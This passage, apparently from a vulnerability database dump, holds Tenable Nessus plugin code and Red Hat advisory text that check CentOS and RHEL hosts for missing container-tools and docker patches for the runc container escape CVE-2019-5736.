value:\"p-cpe:/a:centos:centos:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slirp4netns\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS 
Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\nif ('rhel8' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nappstreams = {\n 'container-tools:rhel8': [\n {'reference':'buildah-1.5-3.gite94b4f9.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'buildah-1.5-3.gite94b4f9.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containers-common-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-2.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'fuse-overlayfs-0.3-2.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module_el8.0.0', 
'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'skopeo-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n 
if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / container-selinux / containernetworking-plugins / etc');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:43:32", "description": "An update for docker is now available for Red Hat Enterprise Linux 7\nExtras.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nDocker is an open source engine that automates the deployment of any\napplication as a lightweight, portable, self-sufficient container that\nruns virtually anywhere.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. 
(CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information,\ncan be found in the vulnerability article linked from the Reference\nsection.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 20, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-12T00:00:00", "title": "RHEL 7 : docker (RHSA-2019:0304)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:docker", "p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-debuginfo", "p-cpe:/a:redhat:enterprise_linux:docker-common", "p-cpe:/a:redhat:enterprise_linux:docker-logrotate", "p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:docker-client", "p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator"], "id": "REDHAT-RHSA-2019-0304.NASL", "href": "https://www.tenable.com/plugins/nessus/122111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0304. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122111);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0304\");\n\n script_name(english:\"RHEL 7 : docker (RHSA-2019:0304)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for docker is now available for Red Hat Enterprise Linux 7\nExtras.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nDocker is an open source engine that automates the deployment of any\napplication as a lightweight, portable, self-sufficient container that\nruns virtually anywhere.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. 
(CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information,\ncan be found in the vulnerability article linked from the Reference\nsection.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/runcescape\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-logrotate\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (rpm_exists(release:\"RHEL7\", rpm:\"atomic-openshift-\")) exit(0, \"OpenShift 3.x is installed, implying SELinux is active in enforcement mode, implying that the RHEL7 system is not vulnerable.\");\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0304\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-client-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-client-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-common-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-common-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-debuginfo-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-debuginfo-1.13.1-91.git07f3374.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-logrotate-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-logrotate-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-lvm-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-lvm-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-novolume-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-novolume-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-rhel-push-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-rhel-push-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-v1.10-migrator-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-v1.10-migrator-1.13.1-91.git07f3374.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-client / docker-common / docker-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:57:05", "description": "An update for the container-tools:rhel8 module is now available for\nRed Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via\n`systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services\n(BZ# 1695689)", "edition": 11, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-05-07T00:00:00", "title": "RHEL 8 : container-tools:rhel8 (RHSA-2019:0975)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-05-07T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource", "p-cpe:/a:redhat:enterprise_linux:buildah-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-umount", "p-cpe:/a:redhat:enterprise_linux:runc-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman-debugsource", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource", 
"p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource", "cpe:/a:redhat:enterprise_linux:8::appstream", "p-cpe:/a:redhat:enterprise_linux:buildah", "p-cpe:/a:redhat:enterprise_linux:container-selinux", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook", "cpe:/o:redhat:enterprise_linux:8.0", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:skopeo", "p-cpe:/a:redhat:enterprise_linux:containers-common", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman-docker", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:slirp4netns"], "id": "REDHAT-RHSA-2019-0975.NASL", "href": "https://www.tenable.com/plugins/nessus/124666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:0975. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124666);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/22\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0975\");\n\n script_name(english:\"RHEL 8 : container-tools:rhel8 (RHSA-2019:0975)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for the container-tools:rhel8 module is now available for\nRed Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via\n`systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services\n(BZ# 1695689)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:buildah-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:skopeo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
